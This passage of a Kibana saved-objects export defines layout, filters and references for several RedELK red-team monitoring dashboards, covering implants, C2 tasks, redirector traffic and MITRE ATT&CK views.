"[{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":0,\"w\":48,\"h\":2,\"i\":\"93f74516-7d73-4db3-8d64-589dfd7492b7\"},\"panelIndex\":\"93f74516-7d73-4db3-8d64-589dfd7492b7\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_93f74516-7d73-4db3-8d64-589dfd7492b7\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":2,\"w\":48,\"h\":2,\"i\":\"66e33663-63c3-4e78-aa5d-725e33754c02\"},\"panelIndex\":\"66e33663-63c3-4e78-aa5d-725e33754c02\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_66e33663-63c3-4e78-aa5d-725e33754c02\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":4,\"w\":8,\"h\":9,\"i\":\"800e8be4-f7c9-46b8-8a7b-e9f229aeb1a3\"},\"panelIndex\":\"800e8be4-f7c9-46b8-8a7b-e9f229aeb1a3\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_800e8be4-f7c9-46b8-8a7b-e9f229aeb1a3\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":8,\"y\":4,\"w\":8,\"h\":9,\"i\":\"86117a55-669e-4d4d-a4d6-436da4f1a930\"},\"panelIndex\":\"86117a55-669e-4d4d-a4d6-436da4f1a930\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_86117a55-669e-4d4d-a4d6-436da4f1a930\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":16,\"y\":4,\"w\":8,\"h\":9,\"i\":\"ab07bed8-9d4e-409c-b3db-d15124eb5467\"},\"panelIndex\":\"ab07bed8-9d4e-409c-b3db-d15124eb5467\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_ab07bed8-9d4e-409c-b3db-d15124eb5467\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":4,\"w\":8,\"h\":9,\"i\":\"019655aa-c9de-444a-a4af-619b7297572b\"},\"panelIndex\":\"019655aa-c9de-444a-a4af-619b7297572b\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_019655aa-c9de-444a-a4af-619b7297572b\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":32,\"y\":4,\"w\":16,\"h\":9,\"i\":\"43a0761e-49bc-4846-9956-04a604b063ec\"},\"panelIndex\":\"43a0761e-49bc-4846-9956-04a604b063ec\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_43a0761e-49bc-4846-9956-04a604b063ec\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":13,\"w\":8,\"h\":9,\"i\":\"eab2038d-128a-4b5b-8a72-701fd3f53bd8\"},\"panelIndex\":\"eab2038d-128a-4b5b-8a72-701fd3f53bd8\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_eab2038d-128a-4b5b-8a72-701fd3f53bd8\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":8,\"y\":13,\"w\":8,\"h\":9,\"i\":\"e18544fe-ac30-43cf-891c-4448ffea6bbd\"},\"panelIndex\":\"e18544fe-ac30-43cf-891c-4448ffea6bbd\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_e18544fe-ac30-43cf-891c-4448ffea6bbd\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":16,\"y\":13,\"w\":16,\"h\":9,\"i\":\"6eb4c88f-1f04-42e1-9300-2fad1e3f6c9d\"},\"panelIndex\":\"6eb4c88f-1f04-42e1-9300-2fad1e3f6c9d\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Compromised realms\",\"panelRefName\":\"panel_6eb4c88f-1f04-42e1-9300-2fad1e3f6c9d\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":32,\"y\":13,\"w\":8,\"h\":9,\"i\":\"223951c1-7fe0-40f9-9a89-0c91aedd7fce\"},\"panelIndex\":\"223951c1-7fe0-40f9-9a89-0c91aedd7fce\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_223951c1-7fe0-40f9-9a89-0c91aedd7fce\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":40,\"y\":13,\"w\":8,\"h\":9,\"i\":\"c15dc2cd-fad3-44a3-b127-1cd47d837740\"},\"panelIndex\":\"c15dc2cd-fad3-44a3-b127-1cd47d837740\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_c15dc2cd-fad3-44a3-b127-1cd47d837740\"}]", "refreshInterval": {"pause": true, "value": 0}, "timeFrom": "now-12M", "timeRestore": true, "timeTo": "now", "title": "RedELK - Summary dashboard", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "02486040-d355-11ea-9301-a30a04251ae9", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "93f74516-7d73-4db3-8d64-589dfd7492b7:panel_93f74516-7d73-4db3-8d64-589dfd7492b7", "type": "visualization"}, {"id": "45491770-0886-11eb-a2d2-171dc8941414", "name": "66e33663-63c3-4e78-aa5d-725e33754c02:panel_66e33663-63c3-4e78-aa5d-725e33754c02", "type": "visualization"}, {"id": "b19d4790-d35f-11ea-9301-a30a04251ae9", "name": "800e8be4-f7c9-46b8-8a7b-e9f229aeb1a3:panel_800e8be4-f7c9-46b8-8a7b-e9f229aeb1a3", "type": "visualization"}, {"id": "dcf86190-d319-11ea-9301-a30a04251ae9", "name": "86117a55-669e-4d4d-a4d6-436da4f1a930:panel_86117a55-669e-4d4d-a4d6-436da4f1a930", "type": "visualization"}, {"id": "b5beb3c0-d04b-11ea-9301-a30a04251ae9", "name": "ab07bed8-9d4e-409c-b3db-d15124eb5467:panel_ab07bed8-9d4e-409c-b3db-d15124eb5467", "type": "visualization"}, {"id": "389dddc0-d317-11ea-9301-a30a04251ae9", "name": "019655aa-c9de-444a-a4af-619b7297572b:panel_019655aa-c9de-444a-a4af-619b7297572b", "type": "visualization"}, {"id": "ce581930-d361-11ea-9301-a30a04251ae9", "name": "43a0761e-49bc-4846-9956-04a604b063ec:panel_43a0761e-49bc-4846-9956-04a604b063ec", "type": "visualization"}, {"id": "57626ad0-d355-11ea-9301-a30a04251ae9", "name": "eab2038d-128a-4b5b-8a72-701fd3f53bd8:panel_eab2038d-128a-4b5b-8a72-701fd3f53bd8", "type": "visualization"}, {"id": "464660c0-d360-11ea-9301-a30a04251ae9", "name": "e18544fe-ac30-43cf-891c-4448ffea6bbd:panel_e18544fe-ac30-43cf-891c-4448ffea6bbd", "type": "visualization"}, {"id": "ff4497f0-d319-11ea-9301-a30a04251ae9", "name": "6eb4c88f-1f04-42e1-9300-2fad1e3f6c9d:panel_6eb4c88f-1f04-42e1-9300-2fad1e3f6c9d", "type": "visualization"}, {"id": "62b61920-d4e2-11ea-9301-a30a04251ae9", "name": "223951c1-7fe0-40f9-9a89-0c91aedd7fce:panel_223951c1-7fe0-40f9-9a89-0c91aedd7fce", "type": "visualization"}, {"id": "7d850b30-d4e2-11ea-9301-a30a04251ae9", "name": "c15dc2cd-fad3-44a3-b127-1cd47d837740:panel_c15dc2cd-fad3-44a3-b127-1cd47d837740", "type": "visualization"}], "sort": [1642171876916, 34], "type": "dashboard", "version": "1"} +{"attributes": {"description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "optionsJSON": "{\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":0,\"w\":48,\"h\":2,\"i\":\"9af964d0-b9c5-4fa0-81d7-6e7cf9657757\"},\"panelIndex\":\"9af964d0-b9c5-4fa0-81d7-6e7cf9657757\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_9af964d0-b9c5-4fa0-81d7-6e7cf9657757\"},{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":2,\"w\":24,\"h\":6,\"i\":\"09cb7bd6-8162-4141-8a0c-807ee57a4603\"},\"panelIndex\":\"09cb7bd6-8162-4141-8a0c-807ee57a4603\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Target host(s) and user(s) filter\",\"panelRefName\":\"panel_09cb7bd6-8162-4141-8a0c-807ee57a4603\"},{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":2,\"w\":12,\"h\":6,\"i\":\"fcd3a5bc-91d9-46a2-b08c-92958c5b6089\"},\"panelIndex\":\"fcd3a5bc-91d9-46a2-b08c-92958c5b6089\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Implants per host\",\"panelRefName\":\"panel_fcd3a5bc-91d9-46a2-b08c-92958c5b6089\"},{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"x\":36,\"y\":2,\"w\":12,\"h\":6,\"i\":\"47710d04-18f9-4563-bf0d-73b4dc24f9e5\"},\"panelIndex\":\"47710d04-18f9-4563-bf0d-73b4dc24f9e5\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Implants per user\",\"panelRefName\":\"panel_47710d04-18f9-4563-bf0d-73b4dc24f9e5\"},{\"version\":\"7.10.0\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":8,\"w\":48,\"h\":51,\"i\":\"30674424-d470-4b93-80c1-260d16f987ab\"},\"panelIndex\":\"30674424-d470-4b93-80c1-260d16f987ab\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_30674424-d470-4b93-80c1-260d16f987ab\"}]", "timeRestore": false, "title": "RedELK - Red Team Operations", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "04b87c50-d028-11ea-9301-a30a04251ae9", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "9af964d0-b9c5-4fa0-81d7-6e7cf9657757:panel_9af964d0-b9c5-4fa0-81d7-6e7cf9657757", "type": "visualization"}, {"id": "d2c7b720-d026-11ea-9301-a30a04251ae9", "name": "09cb7bd6-8162-4141-8a0c-807ee57a4603:panel_09cb7bd6-8162-4141-8a0c-807ee57a4603", "type": "visualization"}, {"id": "632081a0-d02a-11ea-9301-a30a04251ae9", "name": "fcd3a5bc-91d9-46a2-b08c-92958c5b6089:panel_fcd3a5bc-91d9-46a2-b08c-92958c5b6089", "type": "visualization"}, {"id": "6fcf1e70-d02a-11ea-9301-a30a04251ae9", "name": "47710d04-18f9-4563-bf0d-73b4dc24f9e5:panel_47710d04-18f9-4563-bf0d-73b4dc24f9e5", "type": "visualization"}, {"id": "1c580960-b6a9-11e8-bc1a-cf8fa3255855", "name": "30674424-d470-4b93-80c1-260d16f987ab:panel_30674424-d470-4b93-80c1-260d16f987ab", "type": "search"}], "sort": [1642171876916, 40], "type": "dashboard", "version": "1"} +{"attributes": {"description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "optionsJSON": "{\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":0,\"w\":48,\"h\":2,\"i\":\"8f1a6a90-4b7e-47ef-aa74-a6037b7461e1\"},\"panelIndex\":\"8f1a6a90-4b7e-47ef-aa74-a6037b7461e1\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_8f1a6a90-4b7e-47ef-aa74-a6037b7461e1\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":2,\"w\":24,\"h\":9,\"i\":\"ecf77ead-e22f-4708-addf-0cbaaeb6fced\"},\"panelIndex\":\"ecf77ead-e22f-4708-addf-0cbaaeb6fced\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Techniques, Tactics and Procedures\",\"panelRefName\":\"panel_ecf77ead-e22f-4708-addf-0cbaaeb6fced\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":2,\"w\":24,\"h\":18,\"i\":\"ff3f84bc-6c84-43fd-aa0f-19e5a91be826\"},\"panelIndex\":\"ff3f84bc-6c84-43fd-aa0f-19e5a91be826\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"C2 tasks per host and user\",\"panelRefName\":\"panel_ff3f84bc-6c84-43fd-aa0f-19e5a91be826\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":11,\"w\":24,\"h\":9,\"i\":\"23d6ee17-d74f-4a5b-88e4-d286c4b5dd2e\"},\"panelIndex\":\"23d6ee17-d74f-4a5b-88e4-d286c4b5dd2e\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Cobalt Strike tasks per operator\",\"panelRefName\":\"panel_23d6ee17-d74f-4a5b-88e4-d286c4b5dd2e\"},{\"version\":\"7.8.0\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":20,\"w\":48,\"h\":14,\"i\":\"b038a84c-9db0-4266-af43-c8023da4781a\"},\"panelIndex\":\"b038a84c-9db0-4266-af43-c8023da4781a\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"C2 tasks\",\"panelRefName\":\"panel_b038a84c-9db0-4266-af43-c8023da4781a\"}]", "timeRestore": false, "title": "RedELK - Tasks", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "0523c8a0-d025-11ea-9301-a30a04251ae9", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "8f1a6a90-4b7e-47ef-aa74-a6037b7461e1:panel_8f1a6a90-4b7e-47ef-aa74-a6037b7461e1", "type": "visualization"}, {"id": "88db1280-d024-11ea-9301-a30a04251ae9", "name": "ecf77ead-e22f-4708-addf-0cbaaeb6fced:panel_ecf77ead-e22f-4708-addf-0cbaaeb6fced", "type": "visualization"}, {"id": "a5554e20-d025-11ea-9301-a30a04251ae9", "name": "ff3f84bc-6c84-43fd-aa0f-19e5a91be826:panel_ff3f84bc-6c84-43fd-aa0f-19e5a91be826", "type": "visualization"}, {"id": "afb6ce00-d022-11ea-9301-a30a04251ae9", "name": "23d6ee17-d74f-4a5b-88e4-d286c4b5dd2e:panel_23d6ee17-d74f-4a5b-88e4-d286c4b5dd2e", "type": "visualization"}, {"id": "cc523820-d021-11ea-9301-a30a04251ae9", "name": "b038a84c-9db0-4266-af43-c8023da4781a:panel_b038a84c-9db0-4266-af43-c8023da4781a", "type": "search"}], "sort": [1642171876916, 46], "type": "dashboard", "version": "1"} +{"attributes": {"description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"lucene\",\"query\":\"\"},\"filter\":[{\"$state\":{\"store\":\"appState\"},\"meta\":{\"alias\":null,\"disabled\":true,\"key\":\"tags\",\"negate\":false,\"params\":{\"query\":\"iplist_redteam\"},\"type\":\"phrase\",\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match_phrase\":{\"tags\":\"iplist_redteam\"}}},{\"$state\":{\"store\":\"appState\"},\"meta\":{\"alias\":null,\"disabled\":true,\"key\":\"tags\",\"negate\":false,\"params\":{\"query\":\"iplist_customer\"},\"type\":\"phrase\",\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index\"},\"query\":{\"match_phrase\":{\"tags\":\"iplist_customer\"}}}]}"}, "optionsJSON": "{\"darkTheme\":false,\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.16.3\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":0,\"w\":48,\"h\":4,\"i\":\"948c1286-d4de-44a6-8fb2-95bf9252ed00\"},\"panelIndex\":\"948c1286-d4de-44a6-8fb2-95bf9252ed00\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_948c1286-d4de-44a6-8fb2-95bf9252ed00\"},{\"version\":\"7.16.3\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":4,\"w\":36,\"h\":5,\"i\":\"ab9eb0fb-a164-4295-8177-865a2a67dccb\"},\"panelIndex\":\"ab9eb0fb-a164-4295-8177-865a2a67dccb\",\"embeddableConfig\":{\"hidePanelTitles\":false,\"enhancements\":{}},\"title\":\"Filters\",\"panelRefName\":\"panel_ab9eb0fb-a164-4295-8177-865a2a67dccb\"},{\"version\":\"7.16.3\",\"type\":\"visualization\",\"gridData\":{\"x\":36,\"y\":4,\"w\":12,\"h\":5,\"i\":\"c630a33e-6a98-466d-8223-fd83e6947b8c\"},\"panelIndex\":\"c630a33e-6a98-466d-8223-fd83e6947b8c\",\"embeddableConfig\":{\"hidePanelTitles\":false,\"enhancements\":{},\"vis\":{\"legendOpen\":true}},\"title\":\"HTTP Redir traffic per backend\",\"panelRefName\":\"panel_c630a33e-6a98-466d-8223-fd83e6947b8c\"},{\"version\":\"7.16.3\",\"type\":\"map\",\"gridData\":{\"x\":0,\"y\":9,\"w\":24,\"h\":15,\"i\":\"1d1c2c6a-85ff-4b82-9b8d-d172b6e1a57a\"},\"panelIndex\":\"1d1c2c6a-85ff-4b82-9b8d-d172b6e1a57a\",\"embeddableConfig\":{\"hiddenLayers\":[],\"hidePanelTitles\":false,\"isLayerTOCOpen\":false,\"mapCenter\":{\"lat\":14.5701,\"lon\":121.0254,\"zoom\":17},\"openTOCDetails\":[],\"enhancements\":{}},\"title\":\"HTTP redir traffic map\",\"panelRefName\":\"panel_1d1c2c6a-85ff-4b82-9b8d-d172b6e1a57a\"},{\"version\":\"7.16.3\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":9,\"w\":24,\"h\":15,\"i\":\"fc254327-57ac-4e5f-88f7-a32d48570289\"},\"panelIndex\":\"fc254327-57ac-4e5f-88f7-a32d48570289\",\"embeddableConfig\":{\"hidePanelTitles\":false,\"enhancements\":{}},\"title\":\"HTTP Redir traffic over time\",\"panelRefName\":\"panel_fc254327-57ac-4e5f-88f7-a32d48570289\"},{\"version\":\"7.16.3\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":24,\"w\":24,\"h\":15,\"i\":\"829f61cf-9374-4bb5-8214-34e6875e79da\"},\"panelIndex\":\"829f61cf-9374-4bb5-8214-34e6875e79da\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_829f61cf-9374-4bb5-8214-34e6875e79da\"},{\"version\":\"7.16.3\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":39,\"w\":48,\"h\":22,\"i\":\"0bc5f60b-f940-451a-886b-edff3512d180\"},\"panelIndex\":\"0bc5f60b-f940-451a-886b-edff3512d180\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_0bc5f60b-f940-451a-886b-edff3512d180\"}]", "refreshInterval": {"pause": false, "value": 30000}, "timeFrom": "now-1d", "timeRestore": true, "timeTo": "now", "title": "RedELK - Traffic dashboard", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "0f8626d0-c6f4-11e8-a9c6-cd307b96b1ba", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "redirtraffic", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}, {"id": "redirtraffic", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", "type": "index-pattern"}, {"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "948c1286-d4de-44a6-8fb2-95bf9252ed00:panel_948c1286-d4de-44a6-8fb2-95bf9252ed00", "type": "visualization"}, {"id": "56350050-efe7-11eb-8a9f-2572da287875", "name": "ab9eb0fb-a164-4295-8177-865a2a67dccb:panel_ab9eb0fb-a164-4295-8177-865a2a67dccb", "type": "visualization"}, {"id": "d625ba60-efe8-11eb-8a9f-2572da287875", "name": "c630a33e-6a98-466d-8223-fd83e6947b8c:panel_c630a33e-6a98-466d-8223-fd83e6947b8c", "type": "visualization"}, {"id": "dd9e9510-efec-11eb-8a9f-2572da287875", "name": "1d1c2c6a-85ff-4b82-9b8d-d172b6e1a57a:panel_1d1c2c6a-85ff-4b82-9b8d-d172b6e1a57a", "type": "map"}, {"id": "be08d380-efe9-11eb-8a9f-2572da287875", "name": "fc254327-57ac-4e5f-88f7-a32d48570289:panel_fc254327-57ac-4e5f-88f7-a32d48570289", "type": "visualization"}, {"id": "cbb7d710-efee-11eb-8a9f-2572da287875", "name": "829f61cf-9374-4bb5-8214-34e6875e79da:panel_829f61cf-9374-4bb5-8214-34e6875e79da", "type": "visualization"}, {"id": "0f7dcd70-b982-11e8-94dd-171ae5c1fd1a", "name": "0bc5f60b-f940-451a-886b-edff3512d180:panel_0bc5f60b-f940-451a-886b-edff3512d180", "type": "search"}], "sort": [1643016059071, 291], "type": "dashboard", "version": "1"} +{"attributes": {"description": "RedELK implants dashboard", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"lucene\",\"query\":\"\"},\"filter\":[{\"meta\":{\"alias\":null,\"negate\":true,\"disabled\":false,\"type\":\"phrase\",\"key\":\"tags\",\"params\":{\"query\":\"sandboxes_v01\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match_phrase\":{\"tags\":\"sandboxes_v01\"}},\"$state\":{\"store\":\"appState\"}},{\"meta\":{\"alias\":null,\"negate\":true,\"disabled\":false,\"type\":\"phrase\",\"key\":\"tags\",\"params\":{\"query\":\"testsystems_v01\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index\"},\"query\":{\"match_phrase\":{\"tags\":\"testsystems_v01\"}},\"$state\":{\"store\":\"appState\"}}]}"}, "optionsJSON": "{\"darkTheme\":false,\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":2,\"w\":24,\"h\":15,\"i\":\"1\"},\"panelIndex\":\"1\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_1\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":2,\"w\":24,\"h\":15,\"i\":\"2\"},\"panelIndex\":\"2\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_2\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":17,\"w\":24,\"h\":15,\"i\":\"3\"},\"panelIndex\":\"3\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_3\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":32,\"w\":48,\"h\":22,\"i\":\"4\"},\"panelIndex\":\"4\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_4\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":17,\"w\":24,\"h\":15,\"i\":\"5\"},\"panelIndex\":\"5\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_5\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":0,\"w\":48,\"h\":2,\"i\":\"a5e43e90-aa23-403a-9167-bfe8aff7fb6c\"},\"panelIndex\":\"a5e43e90-aa23-403a-9167-bfe8aff7fb6c\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_a5e43e90-aa23-403a-9167-bfe8aff7fb6c\"},{\"version\":\"7.8.0\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":54,\"w\":48,\"h\":19,\"i\":\"b9915fcd-f22e-4326-986a-25684f947b79\"},\"panelIndex\":\"b9915fcd-f22e-4326-986a-25684f947b79\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_b9915fcd-f22e-4326-986a-25684f947b79\"}]", "refreshInterval": {"pause": false, "value": 30000}, "timeFrom": "now-30d", "timeRestore": true, "timeTo": "now", "title": "RedELK - Implants dashboard", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "117dbba0-c6f5-11e8-a9c6-cd307b96b1ba", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", "type": "index-pattern"}, {"id": "e12434d0-b8e8-11e8-94dd-171ae5c1fd1a", "name": "1:panel_1", "type": "visualization"}, {"id": "88003df0-b8ec-11e8-94dd-171ae5c1fd1a", "name": "2:panel_2", "type": "visualization"}, {"id": "10dcc4a0-b8e7-11e8-94dd-171ae5c1fd1a", "name": "3:panel_3", "type": "visualization"}, {"id": "f0dcbda0-b8e5-11e8-94dd-171ae5c1fd1a", "name": "4:panel_4", "type": "visualization"}, {"id": "a1efc620-b8e4-11e8-94dd-171ae5c1fd1a", "name": "5:panel_5", "type": "visualization"}, {"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "a5e43e90-aa23-403a-9167-bfe8aff7fb6c:panel_a5e43e90-aa23-403a-9167-bfe8aff7fb6c", "type": "visualization"}, {"id": "68e8e870-b6aa-11e8-bc1a-cf8fa3255855", "name": "b9915fcd-f22e-4326-986a-25684f947b79:panel_b9915fcd-f22e-4326-986a-25684f947b79", "type": "search"}], "sort": [1642171876916, 56], "type": "dashboard", "version": "1"} +{"attributes": {"description": "MITRE ATT&CK dashboard showing TTPs used (SIEM detection must be configured first)", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "optionsJSON": "{\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":2,\"w\":21,\"h\":17,\"i\":\"e4271670-160e-444d-bb78-46ae1e1c7339\"},\"panelIndex\":\"e4271670-160e-444d-bb78-46ae1e1c7339\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"MITRE ATT&CK Tactics\",\"panelRefName\":\"panel_e4271670-160e-444d-bb78-46ae1e1c7339\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":21,\"y\":2,\"w\":27,\"h\":17,\"i\":\"6b3738e3-3bd8-417f-866a-f7c990b0b6f8\"},\"panelIndex\":\"6b3738e3-3bd8-417f-866a-f7c990b0b6f8\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"MITRE ATT&CK Techniques\",\"panelRefName\":\"panel_6b3738e3-3bd8-417f-866a-f7c990b0b6f8\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":19,\"w\":24,\"h\":15,\"i\":\"de3ced26-2a55-43f5-af28-dc5c2b967c29\"},\"panelIndex\":\"de3ced26-2a55-43f5-af28-dc5c2b967c29\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_de3ced26-2a55-43f5-af28-dc5c2b967c29\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":19,\"w\":24,\"h\":15,\"i\":\"38e24827-8707-4583-805a-98e4138495a7\"},\"panelIndex\":\"38e24827-8707-4583-805a-98e4138495a7\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_38e24827-8707-4583-805a-98e4138495a7\"},{\"version\":\"7.8.0\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":34,\"w\":48,\"h\":15,\"i\":\"60dc249a-1ad0-456c-850b-95c77ea0bc18\"},\"panelIndex\":\"60dc249a-1ad0-456c-850b-95c77ea0bc18\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_60dc249a-1ad0-456c-850b-95c77ea0bc18\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":0,\"w\":48,\"h\":2,\"i\":\"3b895da0-50d0-49e0-a18d-790fd2dddaaa\"},\"panelIndex\":\"3b895da0-50d0-49e0-a18d-790fd2dddaaa\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_3b895da0-50d0-49e0-a18d-790fd2dddaaa\"}]", "timeRestore": false, "title": "RedELK - MITRE ATT&CK", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "3ed7a630-d051-11ea-9301-a30a04251ae9", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "ff3c3b80-d050-11ea-9301-a30a04251ae9", "name": "e4271670-160e-444d-bb78-46ae1e1c7339:panel_e4271670-160e-444d-bb78-46ae1e1c7339", "type": "visualization"}, {"id": "abdcd940-d050-11ea-9301-a30a04251ae9", "name": "6b3738e3-3bd8-417f-866a-f7c990b0b6f8:panel_6b3738e3-3bd8-417f-866a-f7c990b0b6f8", "type": "visualization"}, {"id": "2f5a2760-d050-11ea-9301-a30a04251ae9", "name": "de3ced26-2a55-43f5-af28-dc5c2b967c29:panel_de3ced26-2a55-43f5-af28-dc5c2b967c29", "type": "visualization"}, {"id": 